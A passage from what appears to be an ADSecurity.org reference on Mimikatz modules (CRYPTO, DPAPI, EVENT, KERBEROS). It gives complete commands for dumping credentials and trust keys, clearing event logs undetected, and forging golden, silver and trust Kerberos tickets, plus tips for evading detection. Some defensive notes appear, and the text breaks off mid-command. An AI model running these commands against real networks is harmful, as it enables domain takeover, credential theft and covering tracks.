href="https://github.com/gentilkiwi/mimikatz/wiki/module-%7E-crypto#capi"><code>crypto::capi</code></a> and/or <a href="https://github.com/gentilkiwi/mimikatz/wiki/module-%7E-crypto#cng"><code>crypto::cng</code></a></li> <li>Despite <a href="https://github.com/gentilkiwi/mimikatz/wiki/module-%7E-crypto#capi"><code>crypto::capi</code></a> or <a href="https://github.com/gentilkiwi/mimikatz/wiki/module-%7E-crypto#cng"><code>crypto::cng</code></a> patch, you must have correct ACL on filesystem to access private keys (UAC&#8230; <img loading="lazy" decoding="async" class="emoji" title=":wink:" src="https://camo.githubusercontent.com/eec6777dbcac389ce120a8b4218edabae0c68f39/68747470733a2f2f6173736574732d63646e2e6769746875622e636f6d2f696d616765732f69636f6e732f656d6f6a692f756e69636f64652f31663630392e706e67" alt=":wink:" width="20" height="20" align="absmiddle" data-canonical-src="https://assets-cdn.github.com/images/icons/emoji/unicode/1f609.png" />)</li> <li>Some <strong>smartcard</strong> crypto providers can report a 
successfull private export (it&#8217;s not, of course <img loading="lazy" decoding="async" class="emoji" title=":wink:" src="https://camo.githubusercontent.com/eec6777dbcac389ce120a8b4218edabae0c68f39/68747470733a2f2f6173736574732d63646e2e6769746875622e636f6d2f696d616765732f69636f6e732f656d6f6a692f756e69636f64652f31663630392e706e67" alt=":wink:" width="20" height="20" align="absmiddle" data-canonical-src="https://assets-cdn.github.com/images/icons/emoji/unicode/1f609.png" />)</li> </ul> <p><b>CRYPTO::CertToHW </b>&#8211; try to export a software CA to a crypto (virtual)hardware</p> <p><b>CRYPTO::CNG </b>&#8211; (experimental) Patch CNG service for easy export (patches &#8220;KeyIso&#8221; service)</p> <p><b>CRYPTO::Extract &#8211;</b> [experimental] Extract keys from CAPI RSA/AES provider</p> <p><b>CRYPTO::Hash</b> &#8211; hash a password with optional username</p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3811" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Crypto-Hash.png" alt="" width="642" height="119" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Crypto-Hash.png 1084w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Crypto-Hash-300x56.png 300w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Crypto-Hash-768x142.png 768w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Crypto-Hash-1024x190.png 1024w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Crypto-Hash-1080x201.png 1080w" sizes="(max-width: 642px) 100vw, 642px" /></p> <p><b>CRYPTO::Keys</b>&#8211; list/export keys containers</p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3810" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Crypto-Keys.png" alt="" width="662" height="150" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Crypto-Keys.png 1341w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Crypto-Keys-300x68.png 300w, 
https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Crypto-Keys-768x174.png 768w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Crypto-Keys-1024x231.png 1024w" sizes="(max-width: 662px) 100vw, 662px" /></p> <p><b>CRYPTO::Providers</b> &#8211; list cryptographic providers</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Crypto-Providers.jpg" rel="attachment wp-att-2159"><img loading="lazy" decoding="async" class="alignnone wp-image-2159" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Crypto-Providers.jpg" alt="Mimikatz-Crypto-Providers" width="504" height="333" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Crypto-Providers.jpg 887w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Crypto-Providers-300x198.jpg 300w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Crypto-Providers-768x507.jpg 768w" sizes="(max-width: 504px) 100vw, 504px" /></a></p> <p><b>CRYPTO::SC </b>&#8211; List smartcard readers</p> <p><b>CRYPTO::SCAuth</b>&#8211; Create an authentication certificate (smartcard like) from a CA</p> <p><b>CRYPTO::Stores</b> &#8211; list cryptographic stores</p> <ul> <li>/systemstore &#8211; optional &#8211; the system store that must be used to list stores (default: CERT_SYSTEM_STORE_CURRENT_USER)</li> </ul> <p><span style="text-decoration: underline;">Store Options:</span><br /> CERT_SYSTEM_STORE_CURRENT_USER or CURRENT_USER<br /> CERT_SYSTEM_STORE_CURRENT_USER_GROUP_POLICY or USER_GROUP_POLICY<br /> CERT_SYSTEM_STORE_LOCAL_MACHINE or LOCAL_MACHINE<br /> CERT_SYSTEM_STORE_LOCAL_MACHINE_GROUP_POLICY or LOCAL_MACHINE_GROUP_POLICY<br /> CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE or LOCAL_MACHINE_ENTERPRISE<br /> CERT_SYSTEM_STORE_CURRENT_SERVICE or CURRENT_SERVICE<br /> CERT_SYSTEM_STORE_USERS or USERS<br /> CERT_SYSTEM_STORE_SERVICES or SERVICES</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Crypto-Stores.jpg" rel="attachment 
wp-att-2160"><img loading="lazy" decoding="async" class="alignnone wp-image-2160" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Crypto-Stores.jpg" alt="Mimikatz-Crypto-Stores" width="374" height="215" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Crypto-Stores.jpg 664w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Crypto-Stores-300x173.jpg 300w" sizes="(max-width: 374px) 100vw, 374px" /></a></p> <p><b>CRYPTO::System</b> &#8211; Describe a Windows System Certificate (file, TODO:registry or hive).</p> <p>&nbsp;</p> <h3><b><a id="DPAPI"></a>DPAPI</b></h3> <p>The DPAPI Mimikatz module provides capability to extract Windows stored (and protected) credential data using DPAPI.  <a href="https://msdn.microsoft.com/en-us/library/ms995355.aspx">DPAPI </a>is the official Windows method to protect (encrypt) local data (usually passwords).</p> <blockquote><p>Starting with Microsoft® Windows® 2000, the operating system began to provide a data protection application-programming interface (API). This Data Protection API (DPAPI) is a pair of function calls that provide operating system-level data protection services to user and system processes. By operating system-level, we mean a service that is provided by the operating system itself and does not require any additional libraries. By data protection, we mean a service that provides confidentiality of data by using encryption. Because data protection is part of the operating system, every application can now secure data without needing any specific cryptographic code other than the necessary function calls to DPAPI. These calls are two simple functions with various options to modify DPAPI behavior. Overall, DPAPI is an easy-to-use service that will benefit developers who must provide protection for sensitive application data, such as passwords and private keys.</p> <p>DPAPI is a password-based data protection service. It requires a password to provide protection. 
The drawback, of course, is that all protection provided by DPAPI rests on the password provided. This is offset by DPAPI using proven cryptographic routines, specifically the strong Triple-DES algorithm, and strong keys, which we&#8217;ll cover in more detail later. Because DPAPI is focused on providing protection for users and requires a password to provide this protection, it logically uses the user&#8217;s logon password for protection.</p></blockquote> <p>(The quote is from Microsoft&#8217;s original DPAPI documentation. The practical takeaway for this page is that DPAPI-protected data is only as safe as the user&#8217;s logon password and master key: anyone who recovers either can unprotect the data.)</p> <p>There has been some work done previously regarding attacking DPAPI:</p> <ul> <li><a href="https://www.elie.net/publication/reversing-dpapi-and-stealing-windows-secrets-offline">Reversing DPAPI and Stealing Windows Secrets Offline</a></li> <li><a href="http://www.passcape.com/index.php?section=docsys&amp;cmd=details&amp;id=28">DPAPI Secrets. Security analysis and data recovery in DPAPI</a></li> </ul> <p>Benjamin Delpy has an Excel spreadsheet on OneDrive which lists Windows locations that may have stored credentials &#8211; <a href="https://onedrive.live.com/view.aspx?resid=A352EBC5934F0254!3104&amp;app=Excel">view the spreadsheet online</a>.</p> <p><b>DPAPI::Blob</b> &#8211; Unprotect a DPAPI blob with API or Masterkey</p> <p><b>DPAPI::Cache</b></p> <p><b>DPAPI::CAPI</b> &#8211; CAPI key test</p> <p><b>DPAPI::Chrome </b>&#8211; Chrome test</p> <p><b>DPAPI::CNG</b> &#8211; CNG key test</p> <p><b>DPAPI::Cred</b> &#8211; CRED test</p> <p><b>DPAPI::CredHist</b> &#8211; Configure a Credhist file</p> <p><b>DPAPI::MasterKey</b> &#8211; Configure a Masterkey file, unprotect (key depending)</p> <p><b>DPAPI::Protect</b> &#8211; Protect data using DPAPI</p> <p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-3809" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-DPAPI-Protect.png" alt="" width="1645" height="1590" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-DPAPI-Protect.png 1645w, 
https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-DPAPI-Protect-300x290.png 300w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-DPAPI-Protect-768x742.png 768w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-DPAPI-Protect-1024x990.png 1024w" sizes="(max-width: 1645px) 100vw, 1645px" /></p> <p><b>DPAPI::Vault</b> &#8211; VAULT test</p> <p><b>DPAPI::WIFI</b> &#8211; WIFI test (XML profile required &#8211; <a href="https://onedrive.live.com/view.aspx?resid=A352EBC5934F0254!3104&amp;app=Excel">reference Ben&#8217;s spreadsheet</a>)</p> <p><b>DPAPI::WWAN</b> &#8211; WWAN test (XML profile required &#8211; <a href="https://onedrive.live.com/view.aspx?resid=A352EBC5934F0254!3104&amp;app=Excel">reference Ben&#8217;s spreadsheet</a>)</p> <p>&nbsp;</p> <h3><b><a id="EVENT"></a>EVENT</b></h3> <p><b>EVENT::Clear</b> &#8211; Clear an event log<br /> <a style="background-color: #ffffff;" href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Clear.png"><br /> <img loading="lazy" decoding="async" class="alignnone size-full wp-image-1850" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Clear.png" alt="Mimikatz-Event-Clear" width="559" height="168" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Clear.png 559w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Clear-300x90.png 300w" sizes="(max-width: 559px) 100vw, 559px" /></a></p> <p><b>EVENT::Drop</b> &#8211; (<em><strong>experimental</strong></em>) Patch Events service to avoid new events</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Drop.png"><img loading="lazy" decoding="async" class="alignnone wp-image-1851" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Event-Drop.png" alt="Mimikatz-Event-Drop" width="272" height="48" /></a></p> <p>Note:<br /> Run privilege::debug then event::drop to patch the event log service (in memory) so that no new events are written.  
Then run Event::Clear to clear the event log without any log cleared event (1102) being logged.</p> <p>Defensive note: this is an anti-forensics technique. Events that were already forwarded to a remote collector (Windows Event Forwarding or a SIEM) are unaffected by clearing the local log, and a host that abruptly stops producing events is itself an indicator worth alerting on.</p> <p>&nbsp;</p> <h3><b><a id="IIS"></a>IIS</b></h3> <p>IIS XML Config module</p> <p><b>IIS::AppHost</b></p> <p>&nbsp;</p> <h3><b><a id="KERBEROS"></a>KERBEROS</b></h3> <p>The KERBEROS Mimikatz module is used to interface with the official Microsoft Kerberos API.<br /> No special rights are required for the commands in this module, because they operate on the current logon session&#8217;s ticket cache; dumping other users&#8217; tickets requires <a href="#SEKURLSATickets">SEKURLSA::Tickets</a> with debug privileges.</p> <p><b>KERBEROS::Ask </b>&#8211; request TGS tickets</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-Ask.jpg" rel="attachment wp-att-2692"><img loading="lazy" decoding="async" class="alignnone wp-image-2692" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-Ask.jpg" alt="Mimikatz-Kerberos-Ask" width="452" height="144" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-Ask.jpg 593w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-Ask-300x96.jpg 300w" sizes="(max-width: 452px) 100vw, 452px" /></a></p> <p><b>KERBEROS::Clist</b> &#8211; list tickets in MIT/Heimdal ccache</p> <p><a id="KERBEROSGolden"></a><b>KERBEROS::Golden</b> &#8211; create <a href="https://adsecurity.org/?p=1640">golden</a>/<a href="https://adsecurity.org/?p=1515">silver</a>/<a href="https://adsecurity.org/?p=1588">trust</a> tickets<br /> The capability of this command is based on the password hash type retrieved.</p> <table style="height: 109px;" width="468"> <tbody> <tr> <td width="183"><b>Type</b></td> <td width="200"><b>Requirement</b></td> <td width="400"><b>Scope</b></td> </tr> <tr> <td width="183"><a href="https://adsecurity.org/?p=1640">Golden</a></td> <td width="200">KRBTGT hash</td> <td width="400">Domain/Forest</td> </tr> <tr> <td width="183"><a href="https://adsecurity.org/?p=1515">Silver</a></td> <td width="200">Service hash</td> <td width="400">Service</td> </tr> <tr> <td width="183"><a href="https://adsecurity.org/?p=1588">Trust</a></td> <td 
width="200">Trust hash</td> <td width="400">Domain/Forest -&gt; Domain/Forest<br /> (based on account access)</td> </tr> </tbody> </table> <h4><span style="text-decoration: underline;"><a id="GoldenTicket"></a><strong>Golden Ticket</strong></span></h4> <p>A Golden Ticket is a TGT using the KRBTGT NTLM password hash to encrypt and sign.</p> <p>A Golden Ticket (GT) can be created to impersonate any user (real or imagined) in the domain as a member of any group in the domain (providing a virtually unlimited amount of rights) to any and every resource in the domain. Since the Golden Ticket is an authentication ticket (TGT described below), its scope is the entire domain (and the AD forest by leveraging SID History) since the TGT is used to get service tickets (TGS) used to access resources. The Golden Ticket (TGT) contains user group membership information (PAC) and is signed and encrypted using the key of the domain’s Kerberos service account (KRBTGT), which only the Domain Controllers (the KDC) hold; this is exactly why possession of the KRBTGT hash lets an attacker forge tickets the KDC will accept as genuine.</p> <p>To summarize, once an attacker gets access to the KRBTGT password hash, they can create Golden Tickets (TGT) that provide access to anything in AD at any time. Existing Golden Tickets are only invalidated by changing the KRBTGT password twice, because the KDC still honors tickets encrypted with the previous key.</p> <p><span style="text-decoration: underline;">Mimikatz Golden Ticket Command Reference:</span></p> <p>The Mimikatz command to create a golden ticket is “kerberos::golden”</p> <ul type="disc"> <li>/domain &#8211; the fully qualified domain name. In this example: “lab.adsecurity.org”.</li> <li>/sid &#8211; the SID of the domain. In this example: “S-1-5-21-1473643419-774954089-2222329127”.</li> <li>/sids &#8211; Additional SIDs for accounts/groups in the AD forest with rights you want the ticket to spoof. Typically, this will be the Enterprise Admins group for the root domain  “S-1-5-21-1473643419-774954089-5872329127-519”. 
<a href="https://adsecurity.org/?p=1640">This parameter adds the provided SIDs to the ticket&#8217;s SID History.</a></li> <li>/user &#8211; username to impersonate (the example below uses /admin, which Mimikatz accepts as an alias of /user)</li> <li>/groups (optional) – group RIDs the user is a member of (the first is the primary group).<br /> Add user or computer account RIDs to receive the same access.<br /> Default Groups: 513,512,520,518,519 for the well-known Administrator&#8217;s groups (listed below).</li> <li>/krbtgt – NTLM password hash for the domain KDC service account (KRBTGT). Used to encrypt and sign the TGT.</li> <li>/ticket (optional) – provide a path and name for saving the Golden Ticket file to for later use or use /ptt to immediately inject the golden ticket into memory for use.</li> <li>/ptt – as an alternate to /ticket – use this to immediately inject the forged ticket into memory for use.</li> <li>/id (optional) &#8211; user RID. Mimikatz default is 500 (the default Administrator account RID).</li> <li>/startoffset (optional) – the start offset when the ticket is available (generally set to –10 or 0 if this option is used). Mimikatz Default value is 0.</li> <li>/endin (optional) – ticket lifetime. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 10 hours (600 minutes).</li> <li>/renewmax (optional) – maximum ticket lifetime with renewal. Mimikatz Default value is 10 years (~5,262,480 minutes). 
Active Directory default Kerberos policy setting is 7 days (10,080 minutes).</li> <li>/sids (optional) &#8211; set to be the SID of the Enterprise Admins group in the AD forest ([ADRootDomainSID]-519) to spoof Enterprise Admin rights throughout the AD forest (AD admin in every domain in the AD Forest).</li> <li>/aes128 &#8211; the AES128 key</li> <li>/aes256 &#8211; the AES256 key</li> </ul> <p><span style="text-decoration: underline;">Golden Ticket Default Groups:</span></p> <ul type="disc"> <li>Domain Users SID: S-1-5-21&lt;DOMAINID&gt;-513</li> <li>Domain Admins SID: S-1-5-21&lt;DOMAINID&gt;-512</li> <li>Schema Admins SID: S-1-5-21&lt;DOMAINID&gt;-518</li> <li>Enterprise Admins SID: S-1-5-21&lt;DOMAINID&gt;-519  (only effective when the forged ticket is created in the forest root domain; from a child domain, add the root domain&#8217;s Enterprise Admins SID with the /sids parameter to obtain AD forest admin rights)</li> <li>Group Policy Creator Owners SID: S-1-5-21&lt;DOMAINID&gt;-520</li> </ul> <p>kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt</p> <p>Command Example:<br /> <em>.\mimikatz &#8220;kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt&#8221; exit</em></p> <p>Note that the example sets /startoffset, /endin and /renewmax to the Active Directory defaults (0, 600 and 10,080 minutes) so the forged ticket&#8217;s lifetime matches a legitimate ticket; tickets left at the Mimikatz 10-year defaults are an easy indicator for defenders to look for.</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-CreateGoldenTicket-DarthVader2.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1889" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-CreateGoldenTicket-DarthVader2.png" alt="Mimikatz-CreateGoldenTicket-DarthVader2" width="963" height="510" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-CreateGoldenTicket-DarthVader2.png 963w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-CreateGoldenTicket-DarthVader2-300x159.png 300w" sizes="(max-width: 963px) 100vw, 963px" /></a></p> <p>Golden Ticket 
References:</p> <p>* <a href="https://adsecurity.org/?p=1640">Golden Tickets are now More Golden (with SID History)</a></p> <p><strong>Update 1/5/2016:</strong><br /> In early January 2015, I shared with customers indicators for detecting forged Kerberos tickets and subsequently presented this information at BSides Charm 2015. Soon after, Mimikatz was updated with a domain field that was set to static values, usually containing the string &#8220;eo.oe&#8221;. As of the <a href="https://github.com/gentilkiwi/mimikatz">Mimikatz update dated 1/5/2016</a>, forged Kerberos tickets no longer include a domain anomaly since <a href="https://github.com/gentilkiwi/mimikatz/commit/fbb32cdcfa688892ab91b98044c453414193bb74#diff-60c3d6f46631121e0d6f97c2a2e143c9R602">the netbios domain name is placed in the domain component of the Kerberos ticket</a>.</p> <p>Mimikatz code diff:<br /> <a href="https://adsecurity.org/wp-content/uploads/2015/05/GT-DomainFieldUpdate-20150105.jpg" rel="attachment wp-att-2486"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-2486" src="https://adsecurity.org/wp-content/uploads/2015/05/GT-DomainFieldUpdate-20150105.jpg" alt="GT-DomainFieldUpdate-20150105" width="1495" height="121" srcset="https://adsecurity.org/wp-content/uploads/2015/05/GT-DomainFieldUpdate-20150105.jpg 1495w, https://adsecurity.org/wp-content/uploads/2015/05/GT-DomainFieldUpdate-20150105-300x24.jpg 300w, https://adsecurity.org/wp-content/uploads/2015/05/GT-DomainFieldUpdate-20150105-768x62.jpg 768w, https://adsecurity.org/wp-content/uploads/2015/05/GT-DomainFieldUpdate-20150105-1024x83.jpg 1024w" sizes="(max-width: 1495px) 100vw, 1495px" /></a></p> <p>More information on the difficulty of detecting forged Kerberos tickets (Golden Tickets, Silver Tickets, etc) in the <a href="https://adsecurity.org/?p=1515#DetectingForgedKerberosTickets">Detecting Forged Kerberos Tickets section</a>.</p> <p>&nbsp;</p> <h4><span style="text-decoration: underline;"><a 
id="SilverTicket"></a><strong>Silver Ticket</strong></span></h4> <p>A Silver Ticket is a TGS (similar to TGT in format) using the target service account’s (identified by SPN mapping) NTLM password hash to encrypt and sign.<br /> The Mimikatz command to create a silver ticket is “kerberos::golden” (yes, you run &#8216;golden&#8217; to create silver tickets).</p> <p>Because the ticket is forged with the service account&#8217;s key and presented directly to the service, the Domain Controller is never contacted and has no record of the authentication; the only evidence is on the target host (unless the service performs PAC validation with the DC).</p> <p><span style="text-decoration: underline;">Mimikatz Silver Ticket Command Reference:</span></p> <ul type="disc"> <li><strong>/</strong>domain – the fully qualified domain name. In this example: “lab.adsecurity.org”.</li> <li><strong>/</strong>sid – the SID of the domain. In this example: “S-1-5-21-1473643419-774954089-2222329127”.</li> <li>/sids &#8211; Additional SIDs for accounts/groups in the AD forest with rights you want the ticket to spoof. Typically, this will be the Enterprise Admins group for the root domain  “S-1-5-21-1473643419-774954089-5872329127-519”. <a href="https://adsecurity.org/?p=1640">This parameter adds the provided SIDs to the ticket&#8217;s SID History.</a></li> <li><strong>/</strong>user – username to impersonate</li> <li>/groups (optional) – group RIDs the user is a member of (the first is the primary group)<br /> default: 513,512,520,518,519 for the well-known Administrator’s groups (listed below).</li> <li><strong>/</strong>ticket (optional) – provide a path and name for saving the forged ticket file to for later use or use /ptt to immediately inject the forged ticket into memory for use.</li> <li>/ptt – as an alternate to /ticket – use this to immediately inject the forged ticket into memory for use.</li> <li><strong>/</strong>id (optional) – user RID. Mimikatz default is 500 (the default Administrator account RID).</li> <li>/startoffset (optional) – the start offset when the ticket is available (generally set to –10 or 0 if this option is used). Mimikatz Default value is 0.</li> <li>/endin (optional) – ticket lifetime. Mimikatz Default value is 10 years (~5,262,480 minutes). 
Active Directory default Kerberos policy setting is 10 hours (600 minutes).</li> <li><strong>/</strong>renewmax (optional) – maximum ticket lifetime with renewal. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 7 days (10,080 minutes).</li> <li>/aes128 &#8211; the AES128 key</li> <li>/aes256 &#8211; the AES256 key</li> </ul> <p><span style="text-decoration: underline;">Silver Ticket Required Parameters:</span></p> <ul type="disc"> <li><strong>/</strong>target – the target server’s FQDN.</li> <li><strong>/</strong>service – the kerberos service running on the target server. This is the Service Principal Name class (or type) such as cifs, http, mssql.</li> <li><strong>/</strong>rc4 – the NTLM hash for the service (the computer account or the user account the SPN is registered to). Note that computer account passwords are rotated automatically (every 30 days by default), so a Silver Ticket built from a computer account hash stops working once that password changes.</li> </ul> <p><span style="text-decoration: underline;">Silver Ticket Default Groups:</span></p> <ul type="disc"> <li>Domain Users SID: S-1-5-21&lt;DOMAINID&gt;-513</li> <li>Domain Admins SID: S-1-5-21&lt;DOMAINID&gt;-512</li> <li>Schema Admins SID: S-1-5-21&lt;DOMAINID&gt;-518</li> <li>Enterprise Admins SID: S-1-5-21&lt;DOMAINID&gt;-519  (only effective when the forged ticket is created in the forest root domain; from a child domain, add the root domain&#8217;s Enterprise Admins SID with the /sids parameter to obtain AD forest admin rights)</li> <li>Group Policy Creator Owners SID: S-1-5-21&lt;DOMAINID&gt;-520</li> </ul> <p><span style="text-decoration: underline;">Example Mimikatz Command to Create a Silver Ticket:</span></p> <p>The following Mimikatz command creates a Silver Ticket for the CIFS service on the server adsmswin2k8r2.lab.adsecurity.org. In order for this Silver Ticket to be successfully created, the AD computer account password hash for adsmswin2k8r2.lab.adsecurity.org needs to be discovered, either from an AD domain dump or by running Mimikatz on the local system as shown above (<em>Mimikatz “privilege::debug” “sekurlsa::logonpasswords” exit</em>). The NTLM password hash is used with the /rc4 parameter. 
The service SPN type also needs to be identified in the /service parameter. Finally, the target computer’s fully-qualified domain name needs to be provided in the /target parameter. Don’t forget the domain SID in the /sid parameter.</p> <p><em>mimikatz “kerberos::golden /admin:LukeSkywalker /id:1106 /domain:lab.adsecurity.org /sid:S-1-5-21-1473643419-774954089-2222329127 /target:adsmswin2k8r2.lab.adsecurity.org /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt” exit</em></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/SilverTicketUsage-MemberServer-CIFS-AdminShare2.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1890" src="https://adsecurity.org/wp-content/uploads/2015/09/SilverTicketUsage-MemberServer-CIFS-AdminShare2.png" alt="SilverTicketUsage-MemberServer-CIFS-AdminShare2" width="961" height="343" srcset="https://adsecurity.org/wp-content/uploads/2015/09/SilverTicketUsage-MemberServer-CIFS-AdminShare2.png 961w, https://adsecurity.org/wp-content/uploads/2015/09/SilverTicketUsage-MemberServer-CIFS-AdminShare2-300x107.png 300w" sizes="(max-width: 961px) 100vw, 961px" /></a></p> <p>&nbsp;</p> <p>&nbsp;</p> <h5><span style="text-decoration: underline;"><a id="TrustTicket"></a>Trust Ticket</span></h5> <p>Once the Active Directory Trust password hash is determined (<a href="#LSADUMP">Mimikatz &#8220;privilege::debug&#8221; &#8220;lsadump::trust /patch&#8221; exit</a>), a trust ticket can be generated.<strong><br /> </strong><a href="https://adsecurity.org/?p=1588">More background on Trust Tickets.</a><strong><br /> </strong></p> <p><span style="text-decoration: underline;">Forging Internal AD Forest Trust Tickets</span></p> <p>In this example, Trust tickets leverage two additional tools Benjamin Delpy wrote called AskTGS and Kirbikator.</p> <p><b>Step 1: Dumping trust passwords (trust keys)</b></p> <p>Current Mimikatz versions can extract the trust keys (passwords).<br /> *  <a href="#LSADUMP">Mimikatz 
&#8220;privilege::debug&#8221; &#8220;lsadump::trust /patch&#8221; exit</a><strong><br /> </strong></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Mimikatz-DumpTrustKeys.jpg"><img loading="lazy" decoding="async" class="alignnone wp-image-1697" src="https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Mimikatz-DumpTrustKeys.jpg" alt="TrustTicket-v2-Mimikatz-DumpTrustKeys" width="761" height="577" srcset="https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Mimikatz-DumpTrustKeys.jpg 677w, https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Mimikatz-DumpTrustKeys-300x227.jpg 300w" sizes="(max-width: 761px) 100vw, 761px" /></a></p> <p><b>Step 2: Create a forged trust ticket (inter-realm TGT) using Mimikatz</b></p> <p>Forge the trust ticket which states the ticket holder is an Enterprise Admin in the AD Forest (leveraging SIDHistory, “sids”, across trusts in Mimikatz, my “contribution” to Mimikatz). This enables full administrative access from a child domain to the parent domain. Note that this account doesn’t have to exist anywhere as it is effectively a Golden Ticket across the trust.</p> <p>This works within a forest because SID filtering is not applied to the intra-forest (parent/child) trust, so the SID History carried in the inter-realm ticket is honored by the parent domain. Across a forest or external trust, SID filtering (&#8220;quarantine&#8221;) strips SIDs that do not belong to the trusted domain or forest, which blocks this particular technique unless SID filtering has been disabled on the trust.</p> <p>The Mimikatz command to create a trust ticket is “kerberos::golden”</p> <ul type="disc"> <li><strong>/</strong>domain – the fully qualified domain name of the domain whose trust key was dumped in Step 1 (the child domain). In the command below: “child.lab.adsecurity.org”.</li> <li><strong>/</strong>sid – the SID of the domain. In this example: “S-1-5-21-3677078698-724690114-1972670770”.</li> <li>/sids &#8211; Additional SIDs for accounts/groups in the AD forest with rights you want the ticket to spoof. Typically, this will be the Enterprise Admins group for the root domain  “S-1-5-21-1581655573-3923512380-696647894-519”. 
<a href="https://adsecurity.org/?p=1640">This parameter adds the provided SIDs to the ticket&#8217;s SID History.</a></li> <li><strong>/</strong>user – username to impersonate</li> <li>/groups (optional) – group RIDs the user is a member of (the first is the primary group)<br /> default: 513,512,520,518,519 for the well-known Administrator’s groups (listed below).</li> <li><strong>/</strong>ticket (optional) – provide a path and name for saving the forged ticket file to for later use or use /ptt to immediately inject the forged ticket into memory for use.</li> <li>/ptt – as an alternate to /ticket – use this to immediately inject the forged ticket into memory for use.</li> <li><strong>/</strong>id (optional) – user RID. Mimikatz default is 500 (the default Administrator account RID).</li> <li>/startoffset (optional) – the start offset when the ticket is available (generally set to –10 or 0 if this option is used). Mimikatz Default value is 0.</li> <li>/endin (optional) – ticket lifetime. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 10 hours (600 minutes).</li> <li><strong>/</strong>renewmax (optional) – maximum ticket lifetime with renewal. Mimikatz Default value is 10 years (~5,262,480 minutes). 
Active Directory default Kerberos policy setting is 7 days (10,080 minutes).</li> <li>/aes128 &#8211; the AES128 key</li> <li>/aes256 &#8211; the AES256 key</li> </ul> <p><span style="text-decoration: underline;">Trust Ticket Specific Required Parameters:</span></p> <ul type="disc"> <li><strong>/</strong>target – the target domain&#8217;s FQDN.</li> <li><strong>/</strong>service – the kerberos service running in the target domain (krbtgt).</li> <li><strong>/</strong>rc4 – the trust key: the NTLM hash of the inter-domain trust account as dumped with lsadump::trust in Step 1. This is the trust password, not the KRBTGT hash of either domain.</li> <li><strong>/</strong>ticket – provide a path and name for saving the forged ticket file to for later use or use /ptt to immediately inject the forged ticket into memory for use.</li> </ul> <p><span style="text-decoration: underline;">Trust Ticket Default Groups:</span></p> <ul type="disc"> <li>Domain Users SID: S-1-5-21&lt;DOMAINID&gt;-513</li> <li>Domain Admins SID: S-1-5-21&lt;DOMAINID&gt;-512</li> <li>Schema Admins SID: S-1-5-21&lt;DOMAINID&gt;-518</li> <li>Enterprise Admins SID: S-1-5-21&lt;DOMAINID&gt;-519  (only effective when the forged ticket is created in the forest root domain; from a child domain, add the root domain&#8217;s Enterprise Admins SID with the /sids parameter to obtain AD forest admin rights)</li> <li>Group Policy Creator Owners SID: S-1-5-21&lt;DOMAINID&gt;-520</li> </ul> <p><em>Mimikatz &#8220;Kerberos::golden /domain:child.lab.adsecurity.org 